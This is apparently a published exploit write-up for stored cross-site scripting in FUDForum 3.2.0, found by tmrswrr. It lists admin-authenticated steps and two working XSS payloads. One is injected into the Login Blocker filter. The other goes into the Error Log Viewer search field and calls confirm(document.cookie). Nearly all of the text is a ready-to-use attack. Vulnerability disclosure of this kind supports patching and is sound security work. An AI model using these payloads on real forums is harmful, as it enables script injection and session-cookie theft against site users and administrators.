# Exploit Title: FUDForum 3.2.0 Stored XSS Authenticated
# Exploit Author: tmrswrr
# Vendor Homepage: http://fudforum.org/
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.2.0.zip/download
# Version : 3.2.0


## First Stored XSS

1. Log in with valid administrator credentials.
2. Click Filters > Login Filters
3. Inject Payload Login Blocker Add New Filter:
"><sVg/onLy=1 onLoaD=confirm(1)//

## Second Stored XSS

1. Log in with valid administrator credentials.
2. Click General Management > Error Log Viewer
3. Inject Payload Search for field:
"><img src=x onerrora=confirm() onerror=confirm(document.cookie)>